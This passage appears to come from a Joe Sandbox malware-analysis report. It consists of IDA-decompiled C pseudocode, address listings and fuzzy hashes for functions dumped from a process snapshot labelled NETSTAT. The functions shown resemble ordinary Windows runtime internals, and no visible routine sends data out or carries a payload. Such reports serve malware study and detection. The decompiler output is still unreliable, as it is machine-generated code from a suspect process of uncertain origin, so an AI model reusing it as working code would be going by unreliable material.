						if(_t28 != 0x3447b0c) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x3447b14 = _t50;
						_t48 = _v12;
						 *0x3447b10 = _t9;
						goto L6;
					}
					 *0x3447b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                0x0338a713
                0x0338a714
                0x0338a717
                0x0338a71d
                0x0338a720
                0x0338a722
                0x0338a727
                0x0338a74a
                0x0338a754
                0x0338a75e
                0x0338a768
                0x0338a76a
                0x0338a773
                0x0338a78b
                0x0338a790
                0x0338a792
                0x0338a741
                0x0338a741
                0x0338a743
                0x0338a749
                0x0338a749
                0x0338a732
                0x0338a73a
                0x0338a797
                0x0338a79d
                0x0338a7a3
                0x0338a7a9
                0x0338a7b6
                0x0338a7bc
                0x0338a7ca
                0x0338a7e0
                0x0338a7e2
                0x0338a7e4
                0x033c9bf2
                0x00000000
                0x033c9bf2
                0x0338a7ed
                0x0338a7f2
                0x0338a800
                0x0338a805
                0x0338a80d
                0x0338a812
                0x033c9c08
                0x033c9c08
                0x0338a818
                0x0338a81b
                0x0338a821
                0x0338a824
                0x00000000
                0x0338a824
                0x0338a7ae
                0x00000000
                0x0338a7ae
                0x0338a73c
                0x0338a73e
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 622de194957ab8ba33fcd2130ba72e048099c404e84001d72dc113ec227700ed
                • Instruction ID: e07cc987f415d98d9b9bb9cd98d5ae98248edb409d055e245967e822e1ea68c5
                • Opcode Fuzzy Hash: 622de194957ab8ba33fcd2130ba72e048099c404e84001d72dc113ec227700ed
                • Instruction Fuzzy Hash: 4431C2B9600784AFD711EF48DCC0F257BF9FB84795F14096AF025AB248D3749902C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335AA16 Relevance: .1, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E0335AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x344d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3447b9c; // 0x0
					_t53 = L03374620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0339B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0339F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03366C59(_t53, _t51, _t58) != 0) {
							_t28 = E03385E50(0x333c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0338B230(_v32, _v28, 0x333c2d8, 1,  &_v24);
								_t28 = E0335F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                0x0335aa25
                0x0335aa29
                0x0335aa2d
                0x0335aa30
                0x0335aa37
                0x0335aa3c
                0x033b4458
                0x033b4458
                0x033b4472
                0x033b4474
                0x033b4476
                0x0335aa64
                0x0335aa74
                0x033b447c
                0x033b4483
                0x033b4492
                0x0335aa52
                0x0335aa54
                0x0335aa5e
                0x033b44a8
                0x033b44ad
                0x033b44af
                0x033b44b6
                0x033b44b6
                0x033b44b9
                0x033b44bc
                0x033b44cd
                0x033b44d3
                0x033b44d6
                0x033b44e1
                0x033b44e1
                0x033b44e6
                0x033b44e8
                0x033b44fb
                0x033b44fb
                0x033b44e8
                0x00000000
                0x0335aa5e
                0x033b4476
                0x0335aa42
                0x0335aa46
                0x0335aa48
                0x0335aa4c
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e85796fea4ca12d4479b5c01b1d4092ef0ea61c6f9b7a625f8fd1daef32f6ed
                • Instruction ID: 7b59d934a8152b63b94ec962536dab4e2fefa3d1ff2c66e10314cbb6efc5226f
                • Opcode Fuzzy Hash: 6e85796fea4ca12d4479b5c01b1d4092ef0ea61c6f9b7a625f8fd1daef32f6ed
                • Instruction Fuzzy Hash: 6231A072A00219EBCF11EF65CDC1ABEB7B9EF04700B05446AF911EB150E774A961DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033861A0 Relevance: .1, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E033861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03385E50(0x33367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03429D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0335F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                0x033861b3
                0x033861b5
                0x033861bd
                0x033861c3
                0x033861c7
                0x033861d2
                0x033861ff
                0x033861ff
                0x03386201
                0x03386207
                0x03386207
                0x033861d4
                0x033861d9
                0x00000000
                0x00000000
                0x033861df
                0x033861e2
                0x00000000
                0x00000000
                0x033861e6
                0x033861e8
                0x033861ee
                0x033861ee
                0x033861f9
                0x033c762f
                0x033c7632
                0x033c7635
                0x033c7639
                0x033c7640
                0x033c766e
                0x033c7675
                0x00000000
                0x00000000
                0x033c7681
                0x033c7689
                0x033c768d
                0x033c7691
                0x033c7695
                0x033c7699
                0x033c76af
                0x033c76b5
                0x033c76b7
                0x033c76b7
                0x033c76d7
                0x033c76dc
                0x00000000
                0x033c76dc
                0x033c76a2
                0x033c76a9
                0x033c7651
                0x033c7653
                0x033c7653
                0x033c7656
                0x033c7656
                0x00000000
                0x033c7656
                0x033c7644
                0x033c7646
                0x033c7648
                0x033c7648
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: badbf1ffbfa8fedfbf763ddc59d86b5c62521fd8355b5c0f0819813928ed3e82
                • Instruction ID: 5f20ecbc132d753ef0356d4f4e9bcea301e6cddb95d2300871e158defb842a97
                • Opcode Fuzzy Hash: badbf1ffbfa8fedfbf763ddc59d86b5c62521fd8355b5c0f0819813928ed3e82
                • Instruction Fuzzy Hash: 98315A716157418FD360DF19C981B2AF7E9FB88B00F09496DE9989B752E7B0E804CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03394A2C Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E03394A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x344d360 ^ _t62;
				_v8 =  *0x344d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03372280(_t26, 0x3448608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0336FFB0(_t41, _t51, 0x3448608);
						L2:
						 *0x344b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0339B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03372280(_t28, 0x3448608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0336FFB0(_t42, _t53, 0x3448608);
							if(_t53 != 0) {
								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0336FFB0(_t41, _t51, 0x3448608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                0x03394a2c
                0x03394a34
                0x03394a3c
                0x03394a3e
                0x03394a48
                0x03394a4b
                0x03394a4d
                0x03394a51
                0x03394a9c
                0x00000000
                0x00000000
                0x03394aa3
                0x03394aa8
                0x03394aad
                0x03394ab1
                0x03394ade
                0x03394ae3
                0x03394a5a
                0x03394a62
                0x03394a6a
                0x03394a6e
                0x033cf203
                0x03394a84
                0x03394a88
                0x03394a89
                0x03394a8a
                0x03394a95
                0x03394a95
                0x03394a79
                0x03394a80
                0x03394af2
                0x03394af4
                0x03394af9
                0x03394aff
                0x03394b01
                0x03394b03
                0x03394b08
                0x033cf20a
                0x033cf212
                0x033cf216
                0x033cf216
                0x03394b08
                0x03394b13
                0x03394b1a
                0x033cf229
                0x033cf229
                0x03394b1a
                0x03394a82
                0x00000000
                0x03394a82
                0x03394ab7
                0x03394acd
                0x03394acd
                0x03394ad5
                0x03394ada
                0x00000000
                0x03394ada
                0x03394ac2
                0x03394acb
                0x00000000
                0x00000000
                0x00000000
                0x03394acb
                0x03394a53
                0x03394a53
                0x03394a58
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e8e6e6fd398b59962d322c5acdfc1077f32edba548daa60b667aa9a71e7c000
                • Instruction ID: 5ba8598e09656917d42e03be8091456cce0d1742c9bb1f37385bd3487c203370
                • Opcode Fuzzy Hash: 4e8e6e6fd398b59962d322c5acdfc1077f32edba548daa60b667aa9a71e7c000
                • Instruction Fuzzy Hash: 6B312136605340DFEB21EF15CDC1B2AB7A9FB81B10F18456AE8664F650C770D802CB89
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03398EC7 Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E03398EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x344d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03384E70(0x34486e4, 0x3399490, 0, 0);
					if( *0x34453e8 > 5 && E03398F33(0x34453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x34453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x34453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x333bc46;
						_t48 = E033D7B9C(0x34453e8, 0x333bc46, _t67, 0x34453e8, _t70,  &_v140);
					}
				}
				return E0339B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                0x03398ec7
                0x03398ed9
                0x03398edc
                0x03398ee6
                0x03398ee9
                0x03398eee
                0x03398efc
                0x03398f08
                0x033d1349
                0x033d1353
                0x033d135d
                0x033d1366
                0x033d136f
                0x033d1375
                0x033d137c
                0x033d1385
                0x033d1390
                0x033d1391
                0x033d139c
                0x033d139d
                0x033d13a6
                0x033d13ac
                0x033d13b2
                0x033d13b5
                0x033d13bc
                0x033d13bf
                0x033d13c2
                0x033d13c5
                0x033d13c8
                0x033d13cb
                0x033d13ce
                0x033d13d1
                0x033d13d4
                0x033d13d7
                0x033d13da
                0x033d13dd
                0x033d13e0
                0x033d13e3
                0x033d13e6
                0x033d13e9
                0x033d13f6
                0x033d1400
                0x033d1400
                0x03398f08
                0x03398f32

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79f152da4070ea279bba60c673daf91663e52b1707147cc7bb7f1df9804ec36e
                • Instruction ID: 0ba5838f9211306f308331c68cd871541050d8dbdab33b14ca832224dfaf799e
                • Opcode Fuzzy Hash: 79f152da4070ea279bba60c673daf91663e52b1707147cc7bb7f1df9804ec36e
                • Instruction Fuzzy Hash: F6417FB5D003189ADB20CFAAD981AADFBF8BB49710F5041AFE519A7640E7705A84CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338E730 Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E0338E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03399670() < 0) {
					L033ADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3447b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03374620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0338E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                0x0338e730
                0x0338e736
                0x0338e738
                0x0338e73d
                0x0338e73e
                0x0338e740
                0x0338e749
                0x0338e765
                0x0338e76a
                0x0338e76b
                0x0338e76c
                0x0338e76d
                0x0338e76e
                0x0338e76f
                0x0338e775
                0x0338e777
                0x0338e77e
                0x033cb675
                0x0338e784
                0x0338e784
                0x0338e789
                0x0338e7a8
                0x0338e7ac
                0x0338e807
                0x0338e7ae
                0x0338e7ae
                0x0338e7b1
                0x0338e7b4
                0x0338e7b9
                0x0338e7c0
                0x0338e7c4
                0x0338e7ca
                0x0338e7cc
                0x00000000
                0x0338e7d3
                0x0338e7d6
                0x00000000
                0x00000000
                0x0338e7ff
                0x0338e802
                0x00000000
                0x00000000
                0x0338e7f9
                0x0338e7fc
                0x00000000
                0x00000000
                0x0338e7f3
                0x0338e7f6
                0x00000000
                0x00000000
                0x0338e7ed
                0x0338e7f0
                0x00000000
                0x00000000
                0x0338e7e7
                0x0338e7ea
                0x00000000
                0x00000000
                0x033cb685
                0x033cb688
                0x00000000
                0x00000000
                0x033cb682
                0x00000000
                0x00000000
                0x0338e7cc
                0x0338e7d9
                0x0338e7dc
                0x0338e7de
                0x0338e7de
                0x0338e7ac
                0x0338e7e4
                0x0338e74b
                0x0338e751
                0x0338e759
                0x0338e761
                0x0338e761

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cb2d57019ba72a96ee0e6f4d203b7ac3ace735afbf1e7210f5578ab25b04ef8
                • Instruction ID: b7332935a5668324b71a074c9c01dcb630ebb0c7dd1beeb8a2311fb73b86f12c
                • Opcode Fuzzy Hash: 3cb2d57019ba72a96ee0e6f4d203b7ac3ace735afbf1e7210f5578ab25b04ef8
                • Instruction Fuzzy Hash: CF318C75A14349EFDB04DF58C881B9ABBE8FB09314F14866AF904CB741D631EC80CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338BC2C Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E0338BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3446100; // 0xa
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03372280(0xd, 0x1055f1a0);
				_t41 =  *0x34460f8; // 0x0
				if(_t41 != 0) {
					 *0x34460f8 =  *_t41;
					 *0x34460fc =  *0x34460fc + 0xffff;
				}
				E0336FFB0(_t41, 0x800, 0x1055f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x34460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03374620(0x3446100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3446100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                0x0338bc36
                0x0338bc42
                0x0338bc45
                0x0338bc4a
                0x0338bd35
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0338bc50
                0x0338bc50
                0x0338bc58
                0x0338bc5a
                0x0338bc60
                0x00000000
                0x00000000
                0x033ca4f2
                0x033ca4f6
                0x00000000
                0x00000000
                0x00000000
                0x033ca4fc
                0x0338bc79
                0x0338bc7e
                0x0338bc86
                0x0338bd16
                0x0338bd20
                0x0338bd20
                0x0338bc8d
                0x0338bc94
                0x0338bcbd
                0x0338bcca
                0x0338bccb
                0x0338bccc
                0x0338bccd
                0x0338bcce
                0x0338bcd4
                0x0338bcea
                0x0338bcee
                0x0338bcf2
                0x0338bd00
                0x0338bd04
                0x00000000
                0x0338bc96
                0x0338bcab
                0x0338bcaf
                0x0338bd2c
                0x0338bd2c
                0x0338bd09
                0x00000000
                0x0338bd09
                0x0338bcb1
                0x0338bcb5
                0x0338bcbb
                0x00000000
                0x00000000
                0x00000000
                0x0338bcbb

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cea5a2f1b7f7b8c5a7c6cb181229dd8a31e19b3e43644d154dd82180f6ca1baa
                • Instruction ID: 3f682fc2ab22b548cf01a8154ba6e61607baecae3090c99e874b63601191b73a
                • Opcode Fuzzy Hash: cea5a2f1b7f7b8c5a7c6cb181229dd8a31e19b3e43644d154dd82180f6ca1baa
                • Instruction Fuzzy Hash: 1731C17AA00716ABCB11FF58D8C07A6B3B8FB19315F054079ED44EF205E778D94A8B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03359100 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E03359100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x342f6e8);
				E033AD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E034288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E033AD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x34486c0; // 0xb307b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x34486b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03372280(_t82 + 0xe0, _t82 + 0xe0);
